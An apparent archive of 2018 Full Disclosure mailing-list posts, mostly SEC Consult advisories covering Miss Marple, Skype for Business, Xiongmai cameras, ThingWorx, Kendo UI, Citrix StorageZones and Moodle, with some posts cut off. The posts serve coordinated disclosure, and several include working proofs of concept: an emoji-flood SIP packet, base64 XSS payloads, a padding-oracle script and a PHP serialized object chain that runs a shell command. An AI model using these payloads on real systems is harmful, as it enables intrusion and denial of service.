[FD] SEC Consult SA-20181116-0 :: Multiple critical vulnerabilities in Miss Marple Enterprise Edition

2018-11-21 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20181116-0 >
===
  title: Multiple critical vulnerabilities
product: Miss Marple Enterprise Edition
 vulnerable version: <2.0
  fixed version: 2.0
 CVE number: CVE-2018-19233, CVE-2018-19234
 impact: Critical
   homepage: www.comparex-group.com
  found: 2018-05-29
 by: Marius Schwarz (Office Munich)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"As a global IT company with thirty years of experience, COMPAREX is one of the
world’s leading IT service providers and no. 1 software license management
company in the EMEA markets. COMPAREX develops innovative services that support
management and leverage software products, leading to an overall improvement
of workforce productivity. COMPAREX serves corporate customers spanning from
small businesses to large international corporations as well as the public
institutions supporting every customer during their digital journey towards
productivity optimization. The portfolio has a solid foundation in license
management, software procurement and cloud services. Substantial professional
and managed services complete the portfolio to support customers with services
tailored to their business demands."

Source: https://comparexusa.com/about-us/about/


Business recommendation:

The vendor provides a patch and users of this product are urged to
immediately upgrade to the latest version available.


Vulnerability overview/description:
---
Application overview:
Miss Marple is an inventory software that consists of a client and a server
part. The client (agent) is gathering system information and uploads the
results to a remote server in an encrypted ZIP file.

1) Hardcoded AES key (CVE-2018-19233)
A username and an encrypted password were identified in the Miss Marple
Inventory Agent configuration file. By decompiling the binary, the encryption
method was identified as AES-256 with a hardcoded key and initialization vector.
The credentials are used to deploy the inventory files to a remote server.


2) Uploading arbitrary files
There are two ways an attacker can upload arbitrary files to the server.

2.1) Patching the application binary to bypass the ZIP file extension check

Using this method, it is possible to upload any file to the server, even if
the credentials are unknown to the attacker! This works because every file in
a specific directory gets uploaded, as long as the file has the correct file
extension. This can be bypassed because the file extension is only checked on
the client side and not on the server side. Patching the binary is done by
replacing the extension string with the file extension of the attackers
file eg. ".aspx" in the MMIA.exe binary itself.

2.2) Using cURL to upload arbitrary files

If the credentials are known to the attacker, it is possible to use tools like
cURL to upload arbitrary files to the remote server.

Both ways can be used by an attacker to upload a web-shell to the server and
execute arbitrary commands.


3) Missing update validation (CVE-2018-19234)
Besides the Miss Marple Inventory Agent, an Miss Marple Updater Service is
running on all clients. This service checks for new versions on the same server.
If the files are uploaded to the right directory on the server, the updater will
download and execute them with the highest privileges (NT Authority\SYSTEM) 
without
validating the binaries.
This can also be used for escalating privileges on the client. By uploading a
web-shell using the methods described in vulnerability 2, an attacker gets
sufficient write permissions to access the update directory and to place 
malicious
files on the server. This will execute arbitrary code on all clients using Miss
Marple.


Proof of concept:
-
1) Hardcoded AES key (CVE-2018-19233)
No proof of concept will be provided.

2) Uploading arbitrary files
2.1) No proof of concept will be provided. E.g. the Unicode string for ".zip" 
just
has to be replaced with the file extension for the uploaded web-shell.

2.2) Using cURL to upload arbitrary files
It is possible to upload arbitrary files using cURL and the credentials obtained
in 1).

3) Missing update validation (CVE-2018-19234)
No proof of concept will be provided.


Vulnerable / tested versions:
-
The following versions have been tested and found to be vulnerable:

Miss Marple Inventory Agent / Miss Marple Updater Service 1.13


Vendor contact timeline:

2018-06-

[FD] SEC Consult SA-20181114-0 :: Denial of Service in Microsoft Skype for Business

2018-11-21 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20181114-0 >
===
  title: Denial of Service
product: Microsoft Skype for Business 2016 / Lync 2013
 vulnerable version: Microsoft Skype for Business 2015 (Lync 2013) before
 v15.0.5075.1000
 Skype for Business 2016: before v16.0.4756.1000
  fixed version: Microsoft Skype for Business 2015 (Lync 2013) 
v15.0.5075.1000
 Skype for Business 2016 v16.0.4756.1000
 CVE number: CVE-2018-8546
 impact: Medium
   homepage: https://www.skype.com/en/business/
  found: 08/2018
 by: Sabine Degen (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Skype for Business (formerly Microsoft Office Communicator and Microsoft
Lync) is an instant messaging client used with Skype for Business Server or
with Skype for Business Online (available with Microsoft Office 365).
Skype for Business is enterprise software."

Source: https://en.wikipedia.org/wiki/Skype_for_Business


Business recommendation:

Assess the impact of this vulnerability on your business. The patch
provided by Microsoft should be installed immediately. Especially if
Skype for Business is being used for external communication.


Vulnerability overview/description:
---
A large number of emojis (e.g. ~800 kittens) received in one message by the 
Skype
For Business client freezes the program for a few seconds. This can be
exploited to perform Denial of Service attacks against Skype for Business
users and compromises the availability of the program.

For example, an attacker can continuously send such messages to the chat
window of a meeting room in order to freeze the program for all participants
and prevent them from using the chat or seeing the video.

Note that the sound and video stream is handled by a separate thread and
therefore are not affected (e.g. killed), only the functions related to
graphical user interface become unusable.


Proof of concept:
-
After sending a big amount of emojis (~800 kittens) to a Skype for Business
chat, the program freezes for a few seconds while rendering the chat window.
Continuously sending emojis will make the GUI unusable for the user.
Ongoing conference calls are not affected or interrupted.

The following SIP packet illustrates the attack.

MESSAGE sip:xxx@*redacted*;opaque=user:epid:EwWlc9DdAFGQtozR4vBibAAA;gruu 
SIP/2.0
Via: SIP/2.0/tls 127.0.0.1:7490
From: ;tag=82254700;epid=e67b0162bec8
To: ;tag=5c302cb624;epid=15347556e6
Max-Forwards: 70
CSeq: 12 MESSAGE
User-Agent: Purple/2.12.0 Sipe/1.23.2 (win-i386; RTC/5.0)
Call-ID: 440Eg2C92a5C4Ci0A43m5DDAt76CEb3DEAx13B0x
Route:

Contact: 

Content-Type: text/plain;
charset=UTF-8;msgr=WAAtAE0ATQBTAC0ASQBNAC0ARgBvAHIAbQBhAHQAOgAgAEYATgA9AE0AUwAlADIAMABTAGEAbgBzACUAMgAwAFMAZQByAGkAZgA7ACAARQBGAD0AOwAgAEMATwA9ADAAOwAgAFAARgA9ADAAOwAgAFIATAA9ADAADQAKAA0ACgA
Content-Length: 4420
Authorization: TLS-DSK qop="auth", opaque="174C6224", realm="SIP Communications
Service", targetname="*redacted*", crand="1126134f", cnum="29", 
response="*redacted*"

(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) [...]


Vulnerable / tested versions:
-
The following versions have been identified as vulnerable which were
the latest versions available at the time of the test:

* Lync 2013 (15.0) 64-Bit part of Microsoft Office Professional Plus 2013
* Skype for Business 2016 MSO (16.0.93).64-Bit,

Both versions were running on Windows 10 Pro.

According to the vendor, all previous versions are affected:
* Skype for Business 2015 (Lync 2013) before v15.0.5075.1000
* Skype for Business 2016: before v16.0.4756.1000


Vendor contact timeline:

2018-08-02: Vulnerability details submitted to Microsoft,
MSRC Case 47060 assigned
2018-08-28: Asking for a status update
2018-08-30: Vendor: issue has been reproduced, solution to block the user
provided
2018-08-31: Follow-up questions why DoS is not categorized as security issue
as the provided workaround is not effective for attacks already
in progress
2018-08-31: Vendor: decided to f

[FD] SEC Consult SA-20181009-0 :: Remote Code Execution via XMeye P2P Cloud in Xiongmai IP Cameras, NVRs and DVRs incl. 3rd party OEM devices (CVE-2018-17915, CVE-2018-17917, CVE-2018-17919)

2018-10-09 Thread SEC Consult Vulnerability Lab 
SEC Consult also published a blog post regarding the identified security issues
with further background information:

Blog: https://r.sec-consult.com/xmeye


SEC Consult Vulnerability Lab Security Advisory < 20181009-0 >
===
  title: Remote Code Execution via XMeye P2P Cloud
product: Xiongmai IP Cameras, NVRs and DVRs
 incl. 3rd party OEM devices
 vulnerable version: see below
  fixed version: -
 CVE number: CVE-2018-17915, CVE-2018-17917, CVE-2018-17919
 impact: Critical
   homepage: http://www.xiongmaitech.com/en/
  found: 2018-03-05
 by: Stefan Viehböck (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Hangzhou Xiongmai Technology Co., Ltd concentrates on security surveillance,
Video intelligent research and development. We devote ourselves to
providing good products, technical services for manufacturers,
wholesaler and service provider, in order to offer better experience
for our customers. We are global leading providers in security video
products and technology. Established from 2009, many years development,
the headquarter of XM locate in Yinhu Innovation Center, Fuyang
district, Hangzhou now. Total registered capital reach to 60 million.
Now we owns nearly 2000 employees including a strong R&D team (more
than 300 experienced engineers)."

Source: http://www.xiongmaitech.com/en/index.php/about/company/18


Business recommendation:

SEC Consult has identified highly critical vulnerabilities in Xiongmai
products and the "XMeye P2P Cloud" feature which is being used in many
3rd party OEM devices as well.

The vendor does not provide proper mitigations and hence it is recommended
not to use any products associated with the XMeye P2P Cloud until
all of the identified security issues have been fixed and a thorough
security analysis has been performed by professionals.


Vulnerability overview/description:
---
1) Predictable XMEye Cloud IDs (CVE-2018-17915)
All Xiongmai devices come with a feature called "XMeye P2P Cloud". It is a
proprietary, UDP-based protocol that allows users to access their IP cameras or
NVRs/DVRs via the internet. The feature is enabled by default, no setup by the
user is required.

The device initiates and keeps a connection to a Xiongmai cloud server.
All connections between clients and the devices are established via Xiongmai
cloud servers. This approach allows users to connect to devices that are behind
firewalls, NATed etc.

The unique, per-device identifier is the cloud ID. It is a 16 character long
hexadecimal string (e.g. f7e708f21de0fde0).

Anyone who knows the device identifier and the admin credentials can establish a
connection to a device using the XMEye apps (Android, iOS) or a "VMS" desktop
application.

The Cloud ID may be unique, but it is not random. It is derived (at boot time)
from the device MAC address using a few simple operations (see 
get_sn_from_mac())
below.

An attacker can enumerate potential MACs/cloud IDs and find valid ones.
Then use the weak default credentials to log in. This allows the attacker to
watch the video feed, change the device configuration and possibly gain remote
code execution using other vulnerabilities.

The XMEye functionality allows an attacker to attack devices that are behind
firewalls, NATed networks etc.

MAC addresses have a well defined structure: 3-octet OUI (Vendor) + 3-octet NIC 
ID
OUIs are assigned by the IEEE. Interestingly Xiongmai does not own an OUI, but
instead uses the OUIs of other companies.

The following OUIs are used by Xiongmai devices (OUIs based on internet 
research,
scanning, company names based on [1]):
001210 WideRay Corp
001211 Protechna Herbst GmbH & Co. KG
001212 PLUS Corporation
001213 Metrohm AG
001214 Koenig & Bauer AG
001215 iStor Networks, Inc. 
001216 ICP Internet Communication Payment AG
001217 Cisco-Linksys, LLC
001218 ARUZE Corporation
003E0B - Not assigned


We developed a cloud ID scanner that queries the Xiongmai cloud server. The
responses indicate if there is a device online that uses the given cloud ID,
plus provide the IP of a Xiongmai Cloud hop server that is geographically
close to the device. One query is one UDP packet.

We scanned 0.02% of the devices (random choice) in each OUI range (16 Million
devices per range) and extrapolated the results.

OUI: 001210; IDs checked 3,365;  Devices online 3; Success rate: 0.1%;
extrapolated devices online: 14,957
OUI: 001211; IDs checked 3,363;  Devices online 9; Success r

[FD] Facebook Platform Hack - Critical Access Token Vulnerabilities

2018-10-04 Thread Vulnerability Lab 
Information: The vulnerability about the access token issue was already
reported in december 2017 and january 2018 to the facebook security
team. in the ticket communication all three researchers disclosing the
issue was denied to receive a reward because the whitehat team of
facebook did not see the entire risks and combined problematics. Our
researchers tried to report the issues several way to protect the public
people but after the tickets was slammed down without good arguments, we
silently waited until the situation pops up again. We recorded videos of
the zero-day issues in several app auth services and noticed serveral
times the problematic without coming with facebook to a point were a
solution is issued. Finally there was only one way to deal with it and
this is the way on how we did it.

Responsible for the disclosure of the vulnerabilities are Lawrence Amer
of team vulnerability labs, S*** P and Nirmal Thape. Responsible
for reportings to facebook and the followup communication was Lawrence
Amer and Benjamin Kunz Mejri.

Title: Facebook Inc via Instagram Business - Remote Access Token
Vulnerability (Original Facebook Video)
URL: https://www.youtube.com/watch?v=4Obsd1Qw7uU

Title: Facebook Access Token Vulnerability - Retrieve Data via Instagram
Business
URL: https://www.youtube.com/watch?v=tdLKRky1Da4

Author: Lawrence Amer
https://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer

The issue had several vectors and was exploitable using different
functions like view as, preview and other facebook functions.

Note: The access tokens are already invalidated or refreshed which does
not allow attackers to get back access again. Today facebook replied is
evaluating to pay the mentioned researchers for the findings. We send
some friendly greetings back to facebook and as well to the us
supervisory authority watching the case issue.

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SEC Consult SA-20181001-0 :: Password disclosure vulnerability & XSS in PTC ThingWorx (CVE-2018-17216, CVE-2018-17217, CVE-2018-17218)

2018-10-01 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20181001-0 >
===
  title: Password disclosure vulnerability & XSS
product: PTC ThingWorx
 vulnerable version: 6.5-7.4, 8.0.x, 8.1.x, 8.2.x
  fixed version: see Solution section
 CVE number: CVE-2018-17216, CVE-2018-17217, CVE-2018-17218
 impact: critical
   homepage: https://www.ptc.com
  found: 2018-03-13
 by: M. Tomaselli (Office Munich)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"ThingWorx is more than an IoT platform; it provides the functionality,
flexibility and scalability that businesses need to drive industrial
innovation─including the ability to source, contextualize and synthesize
data while orchestrating processes and delivering powerful web, mobile
and AR experiences."

Source: https://www.ptc.com/en/thingworx8


Business recommendation:

ThingWorx allows to configure Things to communicate with other services over
several protocols (e.g. LDAP integration via a DirectoryServices Thing). In
order to communicate with services that require authentification, ThingWorx
provides functionality to associate credentials to a Thing.

During a brief audit it was noticed that ThingWorx Composer leaks the
following sensitive data:

 1) The PBKDF2WithHmac512 password hash of a user Thing
 2) The AES encrypted password of several Things containing password attributes

Furthermore, the password used for encryption is hard-coded and thus identical
along all installations.

Besides the above mentioned vulnerabilities a reflected cross-site scripting
vulnerability was identified in the ThingWorx SQUEAL search function.

The vendor provides a patch which should be installed immediately.
It is recommended to perform further thorough security audits as the product
may be affected by other potential security vulnerabilities.


Vulnerability overview/description:
---
1) Disclosure of User Password Hashes to Privileged Users (CVE-2018-17216)
ThingWorx discloses the PBKDF2WithHmac512 hashed passwords of its application
users when doing exports with an administrative account. This enables an
attacker to conduct offline brute-force or dictionary attacks against the
obtained password hashes.


2) Disclosure of Encrypted Credentials and Use of Hard-Coded Passwords
(CVE-2018-17217)
A critical information disclosure vulnerability leaks the AES encrypted
passwords of services configured within ThingWorx. Due to a hard-coded
master password in the SecureData class, an attacker is able to decrypt the
obtained passwords which grants him access to other services. The AES encrypted
password gets disclosed in the server response when a user/attacker visits a
Thing that contains credentials.


3) Reflected Cross-Site Scripting (CVE-2018-17218)
The JavaScript part of the ThingWorx SQUEAL search functionality
(searchExpression parameter) which is responsible for parsing the obtained JSON
response fails to properly sanitize user supplied input. If the victim views
attacker-prepared content (e.g. on a website or in an HTML email) an attacker
is able to execute arbitrary actions in the context of its victims' sessions.


Proof of concept:
-
The proof of concept has been removed from this advisory.


Vulnerable / tested versions:
-
The vulnerabilities have been verified to exist in version 8.0.1-b39 which was
the latest version available at the time of the test.

The vendor provided further affected version information. See the Solution
section for reference.


Vendor contact timeline:

2018-03-14: Contacting vendor through email
2018-03-16: Advisory sent to vendor via encrypted mail
2018-03 - 2018-09: Multiple phone calls with PTC R&D department
discussing release & multi-party disclosure
2018-08-15: Vendor provided private notifications to customers to give
45 days to upgrade
2018-10-01: Coordinated release of SEC Consult advisory


Solution:
-
Best recommendation is to upgrade to the latest version of ThingWorx
to version 8.3.2 (at time of writing).

For newer verions, the issue of the hard coded password has been fixed
and the SQUEAL function removed.

The minimum upgrade to obtain mitigations for all 3 issues depends
on the version of ThingWorx in use.

For ThingWorx versions 6.5-7.4, upgrade to 7.4.14+
For ThingWorx version 8.0.x, upgrade to 8.0.12+
For ThingWorx version 8.1.x, upgrade to 8.1.7+
For ThingWorx version 8.2.x, upgrade to 8.2.4+

The vendor always recommends

Re: [FD] SEC Consult SA-20180926-0 :: Stored Cross-Site Scripting in Progress Kendo UI Editor

2018-09-26 Thread SEC Consult Vulnerability Lab 
here with correct email subject :)

On 9/26/18 2:17 PM, SEC Consult Vulnerability Lab wrote:
> SEC Consult Vulnerability Lab Security Advisory < 20180926-0 >
> ===
>   title: Stored Cross-Site Scripting
> product: Progress Kendo UI Editor
>  vulnerable version: v2018.1.221
>   fixed version: none, see workaround
>  CVE number: CVE-2018-14037
>  impact: medium
>homepage: https://www.progress.com/kendo-ui
>   found: 2018-04-23
>  by: M. Tomaselli (Office Munich)
>      SEC Consult Vulnerability Lab
> 
>  An integrated part of SEC Consult
>  Europe | Asia | North America
> 
>  https://www.sec-consult.com
> 
> ===
> 
> Vendor description:
> ---
> "The Editor allows users to create rich text content by means of a WYSIWYG
> interface. This HTML5 widget outputs identical HTML across all major browsers,
> follows accessibility standards and provides an API for content manipulation.
> The generated widget value is comprised of XHTML markup."
> 
> https://www.telerik.com/kendo-ui/editor
> 
> 
> Business recommendation:
> 
> SEC Consult recommends to implement the workarounds provided by the vendor.
> 
> 
> Vulnerability overview/description:
> ---
> The demo application of the Kendo UI Editor which is hosted at
> https://demos.telerik.com/kendo-ui/editor/api implements a Sanitizer function
> which should protect from cross site scripting. However, the implemented
> Sanitizer fails to catch certain payloads which allow an attacker to execute
> JavaScript in the context of the editor itself.
> 
> 
> Proof of concept:
> -
> The following, incomplete list, of payloads can be used to trigger an alert
> box in the API demo application of the Kendo UI Editor:
> https://demos.telerik.com/kendo-ui/editor/api
> 
> 
>  data="data:text/html;base64,PHNjcmlwdD5hbGVydCgic2VjdGVzdCIpPC9zY3JpcHQ+">
> 
>  HTTP-EQUIV="refresh"
> CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
> 
> 
> 
> After a click on the button the setValue function on line 513 of the 
> beautified
> "api.js" is called:
> 
> var setValue = function () {
> editor.value($("#value").val());
> };
> 
> 
> The value function is implemented in line 64383 of the beautified 
> "kendo.all.js"
> file and defined as:
> 
> value: function (html) {
> var body = this.body, editorNS = kendo.ui.editor, options =
> this.options, currentHtml = editorNS.Serializer.domToXhtml(body,
> options.serialization);
> if (html === undefined) {
> return currentHtml;
> }
> if (html == currentHtml) {
> return;
> }
> editorNS.Serializer.htmlToDom(html, body, 
> options.deserialization);
> this.selectionRestorePoint = null;
> this.update();
> this.toolbar.refreshTools();
> },
> 
> In order to mitigate certain XSS payloads the editorNS.Serializer.htmlToDom()
> function is called which can be seen in the excerpt below:
> 
> var Serializer = {
> toEditableHtml: function (html) {
> return (html || '').replace(//g,
> '').replace(/<(\/?)script([^>]*)>/gi,
> '<$1k:script$2>').replace(/]*)>/gi, function (match) {
> return match.replace(onerrorRe, '');
> }).replace(/(<\/?img[^>]*>)[\r\n\v\f\t ]+/gi,
> '$1').replace(/^<(table|blockquote)/i, br +
> '<$1').replace(/^[\s]*( |\u00a0)/i, 
> '$1').replace(/<\/(table|blockquote)>$/i,
> '' + br);
> },
> 
> Although certain payloads are detected and sanitized by the function, the
> implemented protection fails to detect the data uri payload. The payload is
> added unescaped to the editor DOM after several other functions calls.
> 
> 
> Vulnerable / tested versions:
> -
> The following version has been identified to be vulnerable:
> * v2018.1.221
> 
> 
> Vendor contact timeline:
> 
> 2018-05-02: Contacting vendor through email for security contact
> 2018-05-02: Contact person requests to obtain advisory via unencrypted mail
> 2018-05-08: Advisory delivered t

[FD] SEC Consult SA-20180926-0 ::

2018-09-26 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180926-0 >
===
  title: Stored Cross-Site Scripting
product: Progress Kendo UI Editor
 vulnerable version: v2018.1.221
  fixed version: none, see workaround
 CVE number: CVE-2018-14037
 impact: medium
   homepage: https://www.progress.com/kendo-ui
  found: 2018-04-23
 by: M. Tomaselli (Office Munich)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"The Editor allows users to create rich text content by means of a WYSIWYG
interface. This HTML5 widget outputs identical HTML across all major browsers,
follows accessibility standards and provides an API for content manipulation.
The generated widget value is comprised of XHTML markup."

https://www.telerik.com/kendo-ui/editor


Business recommendation:

SEC Consult recommends to implement the workarounds provided by the vendor.


Vulnerability overview/description:
---
The demo application of the Kendo UI Editor which is hosted at
https://demos.telerik.com/kendo-ui/editor/api implements a Sanitizer function
which should protect from cross site scripting. However, the implemented
Sanitizer fails to catch certain payloads which allow an attacker to execute
JavaScript in the context of the editor itself.


Proof of concept:
-
The following, incomplete list, of payloads can be used to trigger an alert
box in the API demo application of the Kendo UI Editor:
https://demos.telerik.com/kendo-ui/editor/api








After a click on the button the setValue function on line 513 of the beautified
"api.js" is called:

var setValue = function () {
editor.value($("#value").val());
};


The value function is implemented in line 64383 of the beautified "kendo.all.js"
file and defined as:

value: function (html) {
var body = this.body, editorNS = kendo.ui.editor, options =
this.options, currentHtml = editorNS.Serializer.domToXhtml(body,
options.serialization);
if (html === undefined) {
return currentHtml;
}
if (html == currentHtml) {
return;
}
editorNS.Serializer.htmlToDom(html, body, options.deserialization);
this.selectionRestorePoint = null;
this.update();
this.toolbar.refreshTools();
},

In order to mitigate certain XSS payloads the editorNS.Serializer.htmlToDom()
function is called which can be seen in the excerpt below:

var Serializer = {
toEditableHtml: function (html) {
return (html || '').replace(//g,
'').replace(/<(\/?)script([^>]*)>/gi,
'<$1k:script$2>').replace(/]*)>/gi, function (match) {
return match.replace(onerrorRe, '');
}).replace(/(<\/?img[^>]*>)[\r\n\v\f\t ]+/gi,
'$1').replace(/^<(table|blockquote)/i, br +
'<$1').replace(/^[\s]*( |\u00a0)/i, 
'$1').replace(/<\/(table|blockquote)>$/i,
'' + br);
},

Although certain payloads are detected and sanitized by the function, the
implemented protection fails to detect the data uri payload. The payload is
added unescaped to the editor DOM after several other functions calls.


Vulnerable / tested versions:
-
The following version has been identified to be vulnerable:
* v2018.1.221


Vendor contact timeline:

2018-05-02: Contacting vendor through email for security contact
2018-05-02: Contact person requests to obtain advisory via unencrypted mail
2018-05-08: Advisory delivered through unencrypted email to vendor
2018-05-29: Contacting vendor for current status and informing them about the
publishing date
2018-07-02: Reminded the vendor that the advisory will be published soon
2018-07-02: Multiple emails exchanged, vendor demands that customers need to
issue a support ticket on this case
2018-07-03: Telling them that it is a security issue they already know two 
months
without seemingly acting upon it.
Vendor: product managers have been informed and will contact us;
no further info
2018-07-11: Asking vendor again for a status update & patch information
2018-07-11: Vendor: "Thank you for following up. I have sent this to the product
team to take into consideration. They will be following up with you 
as
they may need. We appreciate you following up regarding this 
request."
2018-07-12

[FD] SEC Consult SA-20180924-0 :: Multiple Vulnerabilities in Citrix StorageZones Controller

2018-09-25 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180924-0 >
===
  title: Multiple Vulnerabilities
product: Citrix StorageZones Controller
 vulnerable version: all versions before 5.4.2
  fixed version: 5.4.2
 CVE number: CVE-2018-16968, CVE-2018-16969
 impact: Medium
   homepage: https://www.citrix.com/
  found: 2018-08
 by: W. Ettlinger (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"ShareFile is a file sharing service that enables users to easily and securely
exchange documents. ShareFile Enterprise provides enterprise-class service and
includes StorageZones Controller and the User Management Tool. ShareFile
StorageZones Controller extends the ShareFile software as a service (SaaS)
cloud storage by providing your ShareFile account with private data storage,
referred to as StorageZones for ShareFile Data. [...]."

URL: https://docs.citrix.com/en-us/storagezones-controller/5-0.html


Business recommendation:

Users of this product are advised to install the security patch provided by 
Citrix.

The vulnerabilities identified suggest that no sufficient technical security
audit has yet been conducted on the Citrix StorageZones Controller. SEC Consult
recommends Citrix to conduct such an audit.


Vulnerability overview/description:
---
The Citrix StorageZones Controller exposes resources that are typically only
available to the internal network (e.g. CIFS Windows shares) to clients
connecting from the Internet.

In order to hide internal network paths from the user and in order to only allow
access to paths specifically allowed by the administrator, internal network
paths are encrypted. E.g. if an administrator wants to allow access to an UNC
path (e.g. \\testhost\testshare\testdir) this string is encrypted and provided
to the client. When the user calls the API to e.g. list the contents of this
directory, the StorageZones Controller returns the encrypted absolute paths for
each directory entry. This way, the absolute internal paths are always hidden
from the user.

1) Improper Access Restrictions
Citrix StorageZone Controller offers users a functionality to convert UNC paths
into their encrypted form. Therefore, users are able to access any UNC paths
accessible by the StorageZones Controller.

When providing access to a network share, the StorageZones Controller
impersonates the user. Therefore, unauthorized access to network shares is not
possible.

However, Citrix StorageZones Controller internally does not distinguish between
UNC-paths (e.g. \\testhost\testshare) and local paths (e.g. C:\Windows).
Therefore, users may access (e.g. read, write, delete) local paths for which
they have appropriate NTFS permissions.

Note: Citrix StorageZones allows an administrator to define the paths exposed by
the StorageZones Controller. By configuring this setting an administrator can
restrict access to only network paths. The configuration page incorrectly states
that a value of "*" (the default value) "allows connections to all hosts on the
internal network", while in fact it also allows access to local paths.

2) Padding Oracle
The encryption mechanism used by the Citrix StorageZones Controller is
vulnerable to a padding oracle attack. This allows an attacker to partly decrypt
or potentially modify internal paths.

3) Path Traversal
The upload functionality is vulnerable to a path traversal attack if the
preconditions to exploit the vulnerability #1 are met. In practice this
vulnerability has a similar effect as vulnerability #1.


Proof of concept:
-
1) Improper Access Restrictions
The following URL demonstrates how local paths can be encrypted:

https:///cifs/v3/Items/ByPath?path=c:\

The following URL demonstrates how e.g. the contents of the directory can be
listed:

https:///cifs/v3/Items()?$expand=Children


2) Padding Oracle
The following script demonstrates how encrypted internal paths can partly be
decrypted. It may also be possible to partly modify encrypted paths (this has
not been verified).

 snip 
import sys
sys.path.append('python-paddingoracle')

from paddingoracle import BadPaddingException, PaddingOracle, xor
from base64 import b64encode, b64decode
from urllib import quote, unquote
import requests
import socket
import time
import getpass

URL = 'http:///'
AUTH = (raw_input('User: '),
getpass.getpass('Password: '))

CIPHER = ''

class PadBuster(PaddingOracle):
def __init__(s

[FD] SEC Consult SA-20180918-0 :: Remote Code Execution via PHP unserialize in Moodle open-source learning platform

2018-09-18 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180918-0 >
===
  title: Remote Code Execution via PHP unserialize
product: Moodle - Open-source learning platform
 vulnerable version: 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and
 earlier unsupported versions
  fixed version: 3.5.2, 3.4.5, 3.3.8 and 3.1.14
 CVE number: CVE-2018-14630
 impact: critical
   homepage: https://moodle.org/
  found: 2018-07-08
 by: Johannes Moritz (Office Berlin)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Moodle is a learning platform designed to provide educators, administrators
and learners with a single robust, secure and integrated system to create
personalised learning environments. Powering tens of thousands of learning
environments globally, Moodle is trusted by institutions and organisations
large and small, including Shell, London School of Economics,
State University of New York, Microsoft and the Open University. Moodle’s
worldwide numbers of more than 90 million users across both academic and
enterprise level usage makes it the world’s most widely used learning platform."

Source: https://moodle.org/about


Business recommendation:

The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
---
1) Remote Code Execution via PHP unserialize (CVE-2018-14630)
When importing a "drag and drop into text" (ddwtos) question in the legacy
Moodle XML format, the passed feedback answer is used unsanitized in an
unserialize() function, which leads to a PHP Object Injection vulnerability.
By providing a sophisticated PHP Object chain it is possible to leverage the
POI into a fully-blown arbitrary Remote Code Execution (RCE).

To exploit this vulnerability an attacker needs permissions to create a quiz
or at least be able to import questions. A user of the role teacher usually has
these permissions. However, students can also be assigned to the role teacher 
for
a specific course.


Proof of concept:
-
1) Remote Code Execution via PHP unserialize (CVE-2018-14630)
In order to exploit this issue an attacker has to open Moodle's question bank
for a specific course and import the following Moodle XML file. The answer
feedback contains a sophisticated PHP object chain which only contains objects
from Moodles library. After the parsing process the command "echo `whoami`" is
being executed.



  

  question name


  

 
  
 

O:15:"\\core\\lock\\lock":2:{s:3:"key";O:23:"\\core_availability\\tree":1:{s:8:"children";O:24:"\\core\\dml\\recordset_walk":2:{s:8:"callback";s:6:"system";s:9:"recordset";O:25:"question_attempt_iterator":2:

{s:4:"quba";O:26:"question_usage_by_activity":1:{s:16:"questionattempts";a:1:{s:4:"1337";s:13:"echo
`whoami`";}}s:5:"slots";a:1:{i:0;i:1337;s:8:"infinite";i:1;}
 
  
 
  



Vulnerable / tested versions:
-
The following version has been tested which was the most recent one at the
time of the test:

* 3.5.1+

According to the vendor, all previous versions are affected as well:
* 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier unsupported versions


Vendor contact timeline:

2018-07-08: Vulnerability identified, further analysis (credits to Robin 
Peraglie
from RIPS Technologies)
2018-07-09: Contacting vendor through tracker.moodle.org (issue [MDL-62880]
created)
2018-07-09: Vendor replied and supplied a fix for the vulnerability
2018-09-10: Vendor releases patched version
2018-09-18: Public release of security advisory


Solution:
-
The vendor provides a patched version (3.5.2) which should be installed 
immediately:
https://download.moodle.org/releases/latest/

The vendor also provided a security advisory regarding this issue:
https://moodle.org/mod/forum/discuss.php?d=376023#p1516118


Workaround:
---
Disable import of ddwtos questions through XML files.


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~

